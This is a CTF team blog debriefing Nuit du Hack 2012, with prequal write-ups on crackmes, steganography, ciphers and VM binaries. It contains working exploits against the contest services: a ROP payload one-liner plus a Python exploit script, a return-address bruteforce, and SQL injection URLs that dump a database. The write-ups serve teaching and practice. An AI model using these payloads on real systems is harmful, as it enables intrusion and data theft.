w3pwnz

w3pwnz, therefore we are


Tuesday, July 3 2012 12:03

NDH2k12 - Debriefing


We took part in the "Nuit du Hack" CTFs over the last two weekends. CTFs, plural, because there were two of them: a private and a public CTF. The 23rd of June was the "Nuit du Hack" event itself, and both CTFs were originally planned to take place there at the same time, but unfortunately the public CTF was postponed to the following weekend because of technical issues.



* Private CTF :

This was an attack/defense CTF! Each team (13 in total) had a server running a dozen services to patch, protect and attack.
We successfully exploited some web apps, and a so-called "pastebin" challenge (an RCE caused by an overflow in a log-parsing program), which played an important role in this CTF as we'll see :)

Unfortunately for us, at some point in the night (~3:30), almost all teams lost access to their VM, and without really knowing what had caused the situation, the staff decided to stop the CTF early. So after validating our carefully hoarded flags (~20 :p) we finished 2nd with 4250 pts, just behind HackerDom with 4960 pts. Not a bad score, but it left a slightly bitter taste when we later learned what had really happened: a team launched a fork bomb through the pastebin service (it again!), taking down every team that had not patched it (more information: here (EN), here (EN), here (EN), here (EN), here (FR), here (FR) and here).

Since the pastebin caused so much trouble, we wrote a short write-up about it that you can find here :)



[image: private CTF scoreboard]



* Public CTF :

So the public challenge was postponed to the following weekend and lasted 48h. This time it was a "classic" CTF, with challenges to solve in categories such as WebApp, Crackme, Forensics, Stegano and Crypto.
This time we finished 1st, with a total of 13710 points, by solving 23 out of 28 challenges \o/
You can find a few write-ups here:



[image: public CTF ranking]



Sunday, March 25 2012 20:46

NDH2k12 Prequals - unknown binary, need your help - Strange binary file

From: Jessica <jessica@megacortek.com>
To: w3pwnz <w3pwnz@megacortek.com>
Subject: unknown binary, need your help
Attachments : executable1.ndh
Hello again,

Thank you very much for your help. It is amazing that our technical staff and
experts did not manage to recover any of it: the password sounds pretty weak.
I will notify our head of technical staff.

Anyway, I forwarded them the file for further investigation. Meanwhile, we got
fresh news from our mystery guy. He came along with an interesting binary file.
It just looks like an executable, but it is not ELF nor anything our experts
would happen to know or recognize. Some of them were quite impressed by your skills
and do think you may be able to succeed here. I attached the file, if you discover
anything, please send me an email entitled "Strange binary file".

This will be rewarded, as usual. By the way, your account has just been credited
with $100.

Regards,
Jessica.


We first noticed the two strings "Good password" and "Bad password" at the end of the file. An easy way to attack a crackme is to look for references to such strings in the code. The disassembly from vmndh tells us that "Bad password" is loaded from 0x8480, and referenced from 0x82d4:

0x82d4: movl r0, #0x8480
0x82d9: call 0xffdd
0x82dd: ret


This is the "bad boy" case, and whatever "call 0xffdd" is, it must be the print routine (the operand is a signed 16-bit offset relative to the end of the 4-byte call instruction, so it points backwards, to 0x82ba). There were two ways to get the actual addresses of the calls: check them in the debugger, or patch the disassembled output to translate relative calls into absolute ones. This is what patch.py (shown in the "Another weird link" write-up below) does.

With it, we can see that 0x82d4 is called 9 times between 0x82e8 and 0x83e1, each time right after a "jz" instruction.

A first test is made, that checks the length of the input:

0x82e8: mov r7, r0
0x82ec: movl r6, #0x840d
0x82f1: call 0x8003
0x82f5: cmpb r0, #09        ; 9 bytes (8 without "\x0a")
0x82f9: jz 0x0005
0x82fc: call 0x82d4         ; -> bad boy
0x8300: end


After that, each byte pointed to by r7 (our input) is XORed with the byte pointed to by r6 and compared to a hardcoded value; then r7 and r6 are incremented:

0x8301: mov r0, [r7]
0x8305: mov r1, [r6]
0x8309: xor r0, r1
0x830d: cmpb r0, #78
0x8311: jz 0x0005
0x8314: call 0x82d4
0x8318: end
0x8319: inc r7
0x831b: inc r6


Let's load the program in the debugger and put a breakpoint at 0x8301, to see what these registers point to:

[BreakPoint 1 - 0x8301]
0x8301 > mov r0, [r7]
[Console]#> info reg
[r0]: 0061	[r4]: 0000
[r1]: 0000	[r5]: 0000
[r2]: 7fda	[r6]: 840d
[r3]: 001f	[r7]: 7fda
 
[bp]: 7ffa	[zf]: 0001
[sp]: 7fd8	[af]: 0000
[pc]: 8305	[bf]: 0000
[Console]#> x/x 7fda:8
0x7fda: 61 62 63 64 65 66 67 68     <- our input
[Console]#> x/x 840d:8
0x840d: 02 05 03 07 08 06 01 09     <- the key


According to the cmpb instructions, the XOR results must be 78 44 73 6b 61 3e 6e 5e. The correct input is therefore the key XORed with those bytes (Python 3):

>>> bytes.fromhex(format(0x7844736b613e6e5e ^ 0x0205030708060109, "x"))
b'zApli8oW'

Let’s use it:

~/ndh2012$ nc sciteek.nuitduhack.com 4001
Sciteek protected storage #1
Enter your password: zApli8oW
<PSP version="1.99">
<MOTD>
<![CDATA[
Welcome on SciPad Protected Storage.

The most secure storage designed by Sciteek. This storage protocol
allows our users to share files in the cloud, in a dual way.

This daemon has been optimized for SciPad v1, running SciOS 16bits
with our brand new processor.
]]>
</MOTD>
<FLAG>
ea1670464251ea3b65afd624d9b17cd7
</FLAG>
<ERROR>
An unexpected error occured: PSP-UNK-ERR-001> application closed.
</ERROR>
</PSP>

NDH2k12 Prequals - Another weird link - complex remote service

From: Piotr <piotr@megacortek.com>
To: w3pwnz <w3pwnz@megacortek.com>
Subject: Another weird link
Attachments : web3.ndh
Thank you again for this information! We have just credited your account
with $1700. Our spy thinks that Sciteek staff is aware of the mole inside
their building. He is trying to read a private file named "sciteek-private.txt"
located at sciteek.nuitduhack.com:4005. Please find the .ndh attached; if
you are successful, reply with a message entitled "complex remote service".

Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of informations about the mole.

Piotr


We disassembled it using the unlocked VM tool (cf. Unknown zip archive), and used the following Python script to turn the relative call targets of the disassembly into absolute addresses:

#!/usr/bin/env python3
# patch.py: rewrite the relative "call" operands of a vmndh disassembly into
# absolute addresses. target = address of the call + 4 (instruction size) + signed offset.

import re
import sys

CALL_SIZE = 4  # a "call" is 4 bytes, so its offset is relative to pc + 4


def rel(line, size=CALL_SIZE):
    # The two hex literals on a call line are the instruction address and the offset.
    fro, off = re.findall(r"0x([0-9a-f]{1,4})", line)
    ifro, ioff = int(fro, 16), int(off, 16)

    # The offset is a signed 16-bit value.
    if ioff >= 0x8000:
        ioff -= 0x10000

    ito = ifro + size + ioff
    return line.replace(off, format(ito, "04x"))


if __name__ == "__main__":
    with open(sys.argv[1]) as disasm:
        for line in disasm:
            if " call" in line:
                print(rel(line), end="")
            else:
                print(line, end="")

Result:

[...]
0x8497: call 0x84ed
0x849b: mov r0, r2
0x849f: movl r1, #0x847c
0x84a4: movb r2, #0x03
0x84a8: call 0x80c0
0x84ac: cmpb r0, #00
0x84b0: jnz 0x0009
0x84b3: movl r0, #0x8400
0x84b8: call 0x8179
0x84bc: end
0x84bd: pushl #beef  ; Push a canary
0x84c2: nop
0x84c3: mul r2, r4
0x84c7: nop
0x84c8: .byte 0x00
0x84c9: .byte 0x00
0x84ca: .byte 0x00
0x84cb: mov r1, r8
0x84cf: movl r2, #0x03fc  ; Read 1020 bytes
0x84d4: call 0x81d8
0x84d8: mov r0, r1
0x84dc: addl r8, #0200
0x84e1: pop r1
0x84e3: cmpl r1, #beef
0x84e8: jz 0x0001
0x84eb: end
0x84ec: ret
0x84ed: subl r8, #0200 ; Reserve 512 bytes
0x84f2: call 0x84bd
0x84f6: addl r8, #0200                                                
0x84fb: ret

We start from the call at 0x8497 and follow it to 0x84ed, where 512 bytes are reserved on the stack (subl r8, #0200; r8 is the stack pointer here). That function calls 0x84bd, which pushes a fixed canary 0xbeef and then calls the read routine at 0x81d8 with r1 = r8 (the stack buffer) and r2 = 0x03fc.

So sys_read is invoked with a size of 1020 bytes (0x84cf: movl r2, #0x03fc) into a 512-byte buffer: an obvious stack overflow. On return the "canary" is popped and compared against the constant 0xbeef, so it is no protection at all: we just write "\xef\xbe" back at the right place. Unfortunately (but that's moar fun), the stack is not executable because of the NX bit:

% python -c 'print "A"*512+"\xef\xbeBBCC"'|nc sciteek.nuitduhack.com 4005
[!] Segfault 0x4242 (NX bit)

We assumed ASLR was on and no PIE, let's ROP :)

We want to proceed as below:

movl r3, #0x20
movl r2, #0x2000
movl r1, #0
movl r0, #3
syscall                         ; read
mov r1, r2 
movl r2, #0
movl r0, #2
syscall                         ; open
mov r1, r0
movl r2, #0x3000
movl r3, #0x1024
movl r0, #3
syscall                         ; read
mov r3, r0
movl r1, #1
movl r0, #4
syscall                         ; write

Our ROP gadgets:

; READ
[0x8172]
        0x8172: pop r3
        0x8174: pop r2
        0x8176: pop r1
        0x8178: ret
[0x81e4]
        0x81e4: movb r0, #0x03
        0x81e8: syscall
        0x81e9: ret
 
; OPEN
[0x8174]
        0x8174: pop r2
        0x8176: pop r1
        0x8178: ret
[0x81d2]
        0x81d2: movb r0, #0x02
        0x81d6: syscall
        0x81d7: ret
 
; READ
[0x8172]
        0x8172: pop r3
        0x8174: pop r2
        0x8176: pop r1
        0x8178: ret
 
[0x81e0]
        0x81e0: mov r1, r0
        0x81e4: movb r0, #0x03
        0x81e8: syscall
        0x81e9: ret
 
; WRITE
[0x818f]
        0x818f: movb r1, #0x01
        0x8193: movb r0, #0x04
        0x8197: syscall
        0x8198: pop r1
        0x819a: pop r0
        0x819c: ret

ROP Payload:

0x8172
0x14
0x2000
0x0
 
0x81e4
 
0x8174
0x0
0x2000
 
0x81d2
 
0x8172
0x1024
0x3000
0xdead
 
0x81e0
 
0x818f

We then pad the rest of the first read (0x3fc bytes) with junk; the canary takes 2 bytes, so:

'Z' * (0x3fc - 512 - 2 - len(payload)) = 'Z' * 0x1dc

followed by the filename for the second read: "sciteek-private.txt\x00" (20 = 0x14 bytes, the length we hand to the first read gadget of the chain).

So our input is laid out as follows: [JUNK][CANARY][ROP PAYLOAD][JUNK][FILENAME]

Finally our python one-liner:

python -c 'from struct import pack; print "A"*512+"\xef\xbe"+"".join(pack("<H", i) for i in [0x8172, 0x14, 0x2000, 0x0, 0x81e4, 0x8174, 0x0, 0x2000, 0x81d2, 0x8172, 0x1024, 0x3000, 0xdead, 0x81e0, 0x818f])+"Z"*0x1dc+"sciteek-private.txt\x00"'|nc sciteek.nuitduhack.com 4005
 
Dear Patrick,
 
We found a lot of evidence proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith has sent some emails to a contact at Megacortek, containing confidential information.
 
However, these emails seem to have been encrypted and sometimes contain images or audio files which are apparently not related to our company or our business, but one of them contains an archive with an explicit name.
 
We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.
 
Sincerely,
 
David Markham.
[!] Segfault 0x5a5a (NX bit)
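The same exploit, rebuilt as a checked Python 3 script. This is an added example, not the team's original one-liner: it keeps the gadget addresses, the scratch addresses (0x2000, 0x3000) and the sizes from the write-up, but computes the junk padding from the chain length instead of hand-counting it, checks that the first stage fills the 0x3fc-byte read exactly, and checks that the filename length matches the length handed to the read gadget, so that a change to the chain cannot silently shift the second stage. Only the constant names are invented here.

```python
#!/usr/bin/env python3
"""Two-stage stdin payload for the sciteek.nuitduhack.com:4005 service.
Added example, not the team's original one-liner: same gadgets and layout,
with the arithmetic checked instead of hand-computed."""
import sys
from struct import pack, unpack

# Facts from the disassembly above.
FRAME_SIZE = 512        # subl r8, #0200
CANARY = 0xbeef         # pushl #beef ... cmpl r1, #beef (a constant, so trivially bypassed)
READ_SIZE = 0x3fc       # movl r2, #0x03fc : length of the overflowing sys_read
NAME_BUF = 0x2000       # scratch address the chain reads the filename into
DATA_BUF = 0x3000       # scratch address the chain reads the file content into
DATA_LEN = 0x1024       # read/write length, as in the original chain

# Gadgets (address: effect), from the gadget list above.
POP_R3_R2_R1 = 0x8172   # pop r3 ; pop r2 ; pop r1 ; ret
POP_R2_R1 = 0x8174      # pop r2 ; pop r1 ; ret
SYS_READ = 0x81e4       # movb r0, #3 ; syscall ; ret          -> read(r1, r2, r3)
SYS_OPEN = 0x81d2       # movb r0, #2 ; syscall ; ret          -> open(r1, r2), fd returned in r0
READ_FD_R0 = 0x81e0     # mov r1, r0 ; movb r0, #3 ; syscall   -> read(fd, r2, r3)
SYS_WRITE = 0x818f      # movb r1, #1 ; movb r0, #4 ; syscall  -> write(1, r2, r3) ; pop r1 ; pop r0 ; ret


def rop_chain(filename):
    """read(0, NAME_BUF, len) ; open(NAME_BUF, 0) ; read(fd, DATA_BUF, n) ; write(1, DATA_BUF, n)."""
    words = [
        POP_R3_R2_R1, len(filename), NAME_BUF, 0,  # r3 = length, r2 = buffer, r1 = stdin
        SYS_READ,
        POP_R2_R1, 0, NAME_BUF,                    # r2 = flags, r1 = path
        SYS_OPEN,                                  # r0 = fd
        POP_R3_R2_R1, DATA_LEN, DATA_BUF, 0xdead,  # r1 is a placeholder: the next gadget copies r0 (fd) into it
        READ_FD_R0,
        SYS_WRITE,                                 # r3 still holds DATA_LEN
    ]
    return b"".join(pack("<H", w) for w in words)


def padding_length(filename):
    """Junk needed so that the overflowing read consumes exactly READ_SIZE bytes."""
    pad = READ_SIZE - FRAME_SIZE - 2 - len(rop_chain(filename))
    if pad < 0:
        raise ValueError("ROP chain does not fit in the first read")
    return pad


def build_payload(filename=b"sciteek-private.txt\x00"):
    """Stage 1 (overflow + chain, READ_SIZE bytes) followed by stage 2 (the filename)."""
    if not filename.endswith(b"\x00"):
        raise ValueError("open() needs a NUL-terminated path")
    stage1 = (b"A" * FRAME_SIZE                  # fill the 512-byte frame
              + pack("<H", CANARY)               # put the constant canary back
              + rop_chain(filename)              # saved return address onwards
              + b"Z" * padding_length(filename))
    assert len(stage1) == READ_SIZE
    return stage1 + filename                     # consumed by the read(0, NAME_BUF, len) gadget


def chain_words(filename=b"sciteek-private.txt\x00"):
    """The chain as 16-bit words, handy for eyeballing against the gadget list."""
    blob = rop_chain(filename)
    return list(unpack("<%dH" % (len(blob) // 2), blob))


if __name__ == "__main__":
    # python3 exploit.py | nc sciteek.nuitduhack.com 4005
    sys.stdout.buffer.write(build_payload())
```

The two stages travel in one stream: the vulnerable read takes the first 0x3fc bytes, and the read gadget at the start of the chain then takes the next 0x14 bytes as the path, which is why the junk length has to be exact rather than "big enough".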

NDH2k12 Prequals - Any idea how to use this file? - Unknown file extension

After decrypting the secret message, we got a new email, from Piotr this time, a supposed technical operative.

From: Piotr <piotr@megacortek.com>
To: w3pwnz <w3pwnz@megacortek.com>
Subject: Any idea how to use this file?
Attachments : webApp.ndh
Hi

Great job there! You seem to be quite a great cryptographer, wow. Your account has been credited with $100. Btw, I'm Piotr, from the technical staff. Maybe Jessica told you about me, we will interact directly about complex questions.

Anyway, our anonymous contact at Sciteek has sent us another binary file with that strange extension, will you be able to break it? If you manage so, please contact me directly with the subject "Unknown file extension", $1700 dollars to earn!

KR
Piotr


As you can see, he asks us to study a file whose format and extension are unknown.
The file is pretty small (897 bytes), and contains some strings:

# strings webApp.ndh
.NDH{
Welcome on Sciteek' SciPad secure shell !
Please enter your passphrase:
Nope. It is not the good password
sciteek.nuitduhack.com:4000
LxTBh9pv.txt


We easily recognize the other strings as those of the assembly source recovered from the decrypted message (see "Unknown text" below). A quick look at that source shows a blatant 10-byte read into a stack frame that is only 8 bytes long. We can quickly check this buffer overflow on the online service:

# nc sciteek.nuitduhack.com 4000
Welcome on Sciteek' SciPad secure shell !
Please enter your passphrase: 0123456789
[!] Segfault 0x3938 (opcode unknown)


From the plain ASM, we also spot a leftover debug routine (TEMP_ROUTINE) whose job is to display the "esoasoel.txt" file, an obvious target for our BoF. From there on, two options: bruteforce the possible return addresses, or reverse the file format to find the actual address of the debug routine.

Step 1 : The Easy Way


The address space is only 16 bits wide and we have no room for shellcode anyway, so we chose to bruteforce it; at the time, we did not have the NDH virtual machine from the rar archive to get the correct offset directly. The only trick here is to inject 9 bytes instead of 10, so that only the low byte of the saved return address is overwritten and the segfault message leaks its high byte:

$ perl -e 'print "A"x9' | nc sciteek.nuitduhack.com 4000
Welcome on Sciteek' SciPad secure shell !
Please enter your passphrase: [!] Segfault 0x8241 (opcode unknown)


The assembly suggests that the debug routine we are looking for is located after the call to :ask_password in the code segment, so we bruteforced the return address from 0x8200 to 0x83ff inclusive.
Finally, Ezekiel 25:17 pops up:

# python -c "print 'A'*8+'\xdb\x82'" | nc sciteek.nuitduhack.com 4000

Welcome on SciPad Shell, root.

The path of the righteous man is beset on all sides by the inequities of the selfish and the tyranny of evil men. 
Blessed is he who, in the name of charity and good will, shepherds the weak through the valley of darkness, for he is truly his brother's keeper and the finder of lost children. 
And I will strike down upon thee with great vengeance and furious anger those who would attempt to poison and destroy My brothers. 
And you will know My name is the Lord when I lay My vengeance upon thee.

- God (f98eb53e7960c9a663c60a916b6de70e)

Be careful, this service is not protected by any option, to avoid exploitation please use the new version of this shell available on sciteek.nuitduhack.com:4004. 
This service runs in a vm with stack layout randomization which is more secure

Something's fucked up ('cause our developers drink too much beer).
Try later. Or not.


Step 2 : The hard way, ‘cuz you’re a grown up and all.


First we have to study the binary, so hex editor it is.

[image: hex dump of the webApp.ndh header]

The first four bytes are the file type, here ".NDH". The next two bytes hold the size of the code and data sections: 0x37B, i.e. the 897-byte (0x381) file minus the 6-byte header.

The data section is located at the end of the file:

[image: hex dump of the data section of webApp.ndh]

We recognize the strings from the ASM source, with one small difference: the name of the text file (LxTBh9pv.txt instead of ESOASOEL.TXT).

Now we have to find the function that displays the file content. Thanks to the Scios Instruction Set we extracted from the audio file, we know that the binary is mapped at the 0x8000 address. We manually compile the following statement :

.LABEL TEMP_ROUTINE
  MOVL R0, :FLAG_FILE
  CALL :DISP_FILE_CONTENT
  END


MOVL R0, :FLAG_FILE give us the following opcodes :

MOV    REG_DIRECT16 FLAG    R0    FILE NAME ADDR LITTLE ENDIAN
04     02                   00    6e 83


The filename address is obtained by adding the filename's offset in the file (0x374) minus the header size (6) to the memory base address (0x8000), which gives 0x836E.
We can't fully assemble the next statement, because we don't know where the DISP_FILE_CONTENT function is, but we know the assembled statement will look like this:

CALL    DIRECT16 FLAG    FUNCTION ADDRESS
19      04               XX XX


Consequently, we can look for the following bytes in the binary:

04 02 00 6E 83 19 04


[image: hex dump of webApp.ndh around file offset 0x2E1]

And we find them at file offset 0x2E1, which translates to the memory address:

0x8000 + 0x2E1 - 0x6 (HDR_SIZE) = 0x82DB


No surprise here, this is the address we found by bruteforcing the BoF. Well, that's it.
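The same offset-to-address bookkeeping as a Python 3 script. It is an added example, not the team's tooling: it parses the 6-byte header (".NDH" followed by a little-endian size; the "{" that strings printed right after ".NDH" above is the low byte of 0x037B), assembles the MOVL R0 / CALL prefix with the encodings given above, and searches the body for it. The little-endian size field and the sample file it builds for itself are assumptions: the sample is constructed to have the same length (0x381 bytes) and the same offsets as webApp.ndh, with zero filler everywhere else.

```python
#!/usr/bin/env python3
"""Locate TEMP_ROUTINE in an .ndh file by assembling its first instruction and
searching for the bytes. Added example, not the original team's code."""
from struct import pack, unpack

MAGIC = b".NDH"
HDR_SIZE = 6            # 4-byte magic + 2-byte size of code+data
LOAD_BASE = 0x8000      # where the body is mapped in the VM (from the SciOS instruction set)

# Opcode bytes as given in the write-up: MOV + REG_DIRECT16 flag + R0, and CALL + DIRECT16 flag.
MOVL_R0_PREFIX = b"\x04\x02\x00"
CALL_DIRECT16 = b"\x19\x04"


def parse_ndh(data):
    """Return (size, body). The size field is assumed little-endian, like the immediates."""
    if data[:4] != MAGIC:
        raise ValueError("not an .NDH file")
    (size,) = unpack("<H", data[4:HDR_SIZE])
    body = data[HDR_SIZE:HDR_SIZE + size]
    if len(body) != size:
        raise ValueError("truncated file: header says %#x bytes, got %#x" % (size, len(body)))
    return size, body


def offset_to_addr(file_offset):
    return LOAD_BASE + file_offset - HDR_SIZE


def addr_to_offset(addr):
    return addr - LOAD_BASE + HDR_SIZE


def asm_movl_r0(addr):
    """MOVL R0, #addr  ->  04 02 00 <addr little-endian>"""
    return MOVL_R0_PREFIX + pack("<H", addr)


def find_temp_routine(data, flag_name):
    """Address of 'MOVL R0, :FLAG_FILE ; CALL ...' and address of the filename string."""
    size, body = parse_ndh(data)
    name_off = body.find(flag_name + b"\x00")
    if name_off < 0:
        raise ValueError("flag filename not found in data section")
    name_addr = offset_to_addr(name_off + HDR_SIZE)
    code_off = body.find(asm_movl_r0(name_addr) + CALL_DIRECT16)
    if code_off < 0:
        raise ValueError("no MOVL R0 / CALL sequence references the filename")
    return offset_to_addr(code_off + HDR_SIZE), name_addr


def make_sample(flag_name=b"LxTBh9pv.txt"):
    """Constructed stand-in for webApp.ndh: same length and offsets, zero filler elsewhere."""
    body = bytearray(0x37B)
    seq = asm_movl_r0(offset_to_addr(0x374)) + CALL_DIRECT16 + b"\x00\x00"  # call target unknown
    code_off = addr_to_offset(0x82DB) - HDR_SIZE
    body[code_off:code_off + len(seq)] = seq
    name_off = 0x374 - HDR_SIZE
    body[name_off:name_off + len(flag_name) + 1] = flag_name + b"\x00"
    return MAGIC + pack("<H", len(body)) + bytes(body)


if __name__ == "__main__":
    routine, name = find_temp_routine(make_sample(), b"LxTBh9pv.txt")
    print("TEMP_ROUTINE at %#06x, flag filename at %#06x" % (routine, name))
```

Searching for the assembled reference rather than for the string itself is what makes this work without a disassembler: the string can only be loaded through its absolute address, so the address bytes pin down the one instruction that uses it.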

NDH2k12 Prequals - We are looking for a real hacker - Wallpaper image

[image: challenge e-mail "Wallpaper image"]
The BMP file has no padding bytes, and its size matches the image dimensions (4374054 = 810*1800*3 + 0x36 for the header).
On the other hand, applying an LSB filter reveals that something is wrong on the left side of the image: the 630 leftmost columns look filled with random bits.
[image: LSB plane of sp113.bmp, noise in the 630 leftmost columns]
The three colour channels are affected in the same way, and the second-lowest bit is normal. So we almost certainly have an LSB encoding with one bit per byte.

The fact that the bits form a rectangle suggests the encoding followed the image order rather than the file order. The two most logical choices (for Westerners) are left-to-right and top-to-bottom. I was going for the former; by the grace of a random bug I tried the latter first.

Here is how the data begin:

00 02 eb 9b 78 9c d4 b9 65 54 ...


The index of coincidence reveals a flat distribution: the data could be either encrypted or compressed. But then, the first two bytes are suspiciously low.
0x2eb9b (191387) is also very close to the rectangle size: 630*810*3 / 8 = 191362. And as it happens, 78 9C is a typical beginning for zlib-compressed data (deflate algorithm).

Quote from http://garethrees.org/2007/11/14/pngcrush/ :

"The header byte 78 meaning "deflate compression with a 32 KiB window".
The informational byte 9c meaning "the default compression algorithm was used" (plus a checksum)."


So all that has to be done is to extract the least significant bits in column-major (up-to-down), skip the first four bytes indicating the size of the file, and decompress the rest with zlib.

The output file is a pdf describing a few products from SCIOS. This file is the flag.

#!/usr/bin/env python3
# Extract the least significant bit of every channel, column by column (x outer,
# y inner), strip the 4-byte big-endian length prefix and inflate the rest with zlib.
import struct
import zlib

from PIL import Image   # Pillow; the original script used the old "import Image"

bmp = Image.open("sp113.bmp").convert("RGB")
pix = bmp.load()
width, height = bmp.size

bits = []
for x in range(min(640, width)):    # the hidden data sits in the 630 leftmost columns;
    for y in range(height):         # the length prefix tells us where to stop anyway
        bits.extend(str(channel & 1) for channel in pix[x, y])
bitstring = "".join(bits)
data = bytes(int(bitstring[i:i + 8], 2) for i in range(0, len(bitstring), 8))

(length,) = struct.unpack(">I", data[:4])   # 00 02 eb 9b -> 0x2eb9b
pdf = zlib.decompress(data[4:4 + length])

with open("sp113.pdf", "wb") as outfile:    # "b" is for Windows users
    outfile.write(pdf)




NDH2k12 Prequals - We are looking for a real hacker - Unknown text

[image: challenge e-mail "Unknown text"]
Attachment: sp111

After opening the sp111 text file, we guessed that it was encrypted with a Vigenère cipher.

We tried an automatic decryption with http://www.apprendre-en-ligne.net/crypto/vigenere/decryptauto.html, which reported "OFJZUANDEOQDK" as the most probable key.

We reconstructed the following plaintext:

; HI,
 
; I WAS DISCRETELY WANDERING AROUND AS USUAL YESTERDAY. A COUPLE OF
; SYSTEM DEVELOPPERS WERE SHOUTING ABOUT CORPORATE DEVICES QUALITY
; DECREASING EVERY YEAR WHEN THEY FINALLY AGREED ABOUT USING LOCAL
; NETWORK TO TRANSFER SOME PICTURES. FROM THE DEAD USB KEY I MANAGED
; TO RECOVER FROM THE TRASHCAN AND TO CLEAN, I FINALLY EXTRACTED A
; COUPLE OF MEGABYTES OF UNALTERED DATA. WORTHLESS CORPORATE
; MAILS, PERSONAL PICTURES I DECIDED TO KEEP FOR MY PRIVATE USE AND FEW
; INTERESTING FILES, ESPECIALLY SOME ASM SOURCE CODE THAT YOU MIGHT
; FIND VALUABLE. I ATTACHED ONE OF THEM, PLEASE CONTACT ME IF YOU WOULD
; LIKE ANY FURTHER INVESTIGATION ABOUT THOSE PIECES OF CODE.
 
; TEST PROGRAM #1 - BUILD #35 FOR SCIPAD
; HTTP://SCITEEK.NUITDUHACK.COM
 
; SOME INCLUDES #INCLUDE INC/STDLIB.INC
 
; THIS ROUTINE ASKS FOR A PASSWORD AND PUT THE ADDRESS IN R5 AND THE SIZE IN R0
 
.LABEL ASK_PASSWORD
   ; DISPLAY A PROMPT
   MOVL R0, :PWD_MSG
   CALL :PRINT
 
   ; ALLOCATE SOME SPACE ON STACK
   SUBB SP, #8
   MOV R5, SP
   MOVL R0, STDIN
   MOV R1,  R5
   MOVB R2, #10
 
   ; READ THE PASSWORD FROM STDIN
   CALL :READ
 
   ; RESTORE THE STACK POINTER
   ADDB SP, #8
 
   ; RETURN
   RET
 
; OUR MAIN
;
; BASICALLY, THIS PROGRAM DOES NOTHING USEFUL ... IT IS JUST A SAMPLE ;)
 
.LABEL MAIN
   ; DISPLAY A WELCOME MESSAGE
   MOVL R0, :WELCOME
   CALL :PRINT
 
   ; ASK FOR A PASSWORD
   CALL :ASK_PASSWORD
 
   ; DISPLAYS AN ERROR
   MOVL R0, :ERROR
   CALL :PRINT
 
   ; QUIT
   END    
 
; TEMP ROUTINE (NOT USED ANYMORE)
 
.LABEL TEMP_ROUTINE
   MOVL R0, :FLAG_FILE
   CALL :DISP_FILE_CONTENT
   END
 
.LABEL WELCOME
.DB "WELCOME ON SCITEEK' SCIPAD SECURE SHELL !",0X0A,0
 
.LABEL PWD_MSG
.DB "PLEASE ENTER YOUR PASSPHRASE: ",0
 
.LABEL ERROR
.DB "NOPE. IT IS NOT THE GOOD PASSWORD",0X0A,0
 
.LABEL HINT
.DB "SCITEEK.NUITDUHACK.COM:4000",0
 
.LABEL FLAG_FILE
.DB "ESOASOEL.TXT",0

NDH2k12 Prequals - New email from our contact - Sciteek shortener

[image: challenge e-mail "New email from our contact"]

According to the description, http://sci.nuitduhack.com was a URL-shortening service.

After looking into how these services work, I found two "common" practices.

The first is inserting URLs into the database and transforming the ID of the record into Base36 (letters a-z, digits 0-9) or some other custom encoding, and using it as the alias. But since the alias in the link we were given had uppercase and lowercase characters as well as digits, the transformation had to be Base62, or it used some other way to map aliases to URLs. Base62 didn't give us any results, so we moved on to the second way of mapping.

That is storing the alias and the URL in separate fields of the database. The alias then takes part in an SQL query that could be prone to SQL injection, and thus our way in.

Testing this idea with

http://sci.nuitduhack.com/' UNION SELECT @@version-- a%%%

gave us our first result: the version of the database was returned as the URL, so the alias was passed unfiltered.

Now we just had to find the table and column names.

Some queries to information_schema did the trick:

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 0,1-- a

returns shortner id

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1,1-- a

returns shortner alias

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 2,1-- a

returns shortner url

Next was to find out how many ids are in the table.
Asking the polite database

http://sci.nuitduhack.com/' UNION SELECT CONCAT(min(id),' ',max(id),' ',count(*)) from shortner-- a

answered with 33 43 11 so there are 11 records in the database starting with id 33 up to 43.
So no need for a bruteforcer to get all records.

The precious flag was in id 40

http://sci.nuitduhack.com/' UNION SELECT CONCAT(url,' ',alias) FROM shortner WHERE id=40-- a


http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt 5867hjgjhgffdedeseddf7967

b92b5e7094c7ffb35a526c9eaa6fab0a



Bonus url :

http://sci.nuitduhack.com/f69148e2 Google

http://sci.nuitduhack.com/7e3aacb2 http://www.hackerzvoice.com

http://sci.nuitduhack.com/1596a271 http://www.bonjourmadame.fr

http://sci.nuitduhack.com/9d0e9373 http://www.bonjourvoisine.fr

http://sci.nuitduhack.com/83df9275 http://www.lkcd.net :?

http://sci.nuitduhack.com/732c1d61 https://www.google.fr/search?q=the+answer+to+life+the+universe+and+everything

http://sci.nuitduhack.com/342d1fff CTF Ranking

http://sci.nuitduhack.com/zomgwtf Rickrolling ;-)

http://sci.nuitduhack.com/trololololololololololololo http://trololololololololololo.com/

http://sci.nuitduhack.com/admin-backend-full WTF !?
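What the shortener was doing, reduced to a runnable Python 3 demonstration. This is an added example, not the CTF service's code: sqlite3 stands in for MySQL (so sqlite_master replaces information_schema, sqlite_version() replaces @@version and || replaces CONCAT), the table rows are constructed except for the id 40 entry reported above, and the lookup is written twice, as the string-built query the injection relies on and as the parameterized query that closes it. Function and constant names are invented for the example.

```python
#!/usr/bin/env python3
"""URL-shortener alias lookup, vulnerable and fixed. Added example on sqlite3;
the real service ran MySQL."""
import sqlite3

FLAG_URL = "http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt"
FLAG_ALIAS = "5867hjgjhgffdedeseddf7967"

# Constructed rows: ids 33..43 (11 records, as the min/max/count probe reported);
# only id 40 carries the values seen in the write-up.
ROWS = [(i, "alias%d" % i, "http://example.invalid/%d" % i) for i in range(33, 44)]
ROWS[40 - 33] = (40, FLAG_ALIAS, FLAG_URL)


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE shortner (id INTEGER PRIMARY KEY, alias TEXT, url TEXT)")
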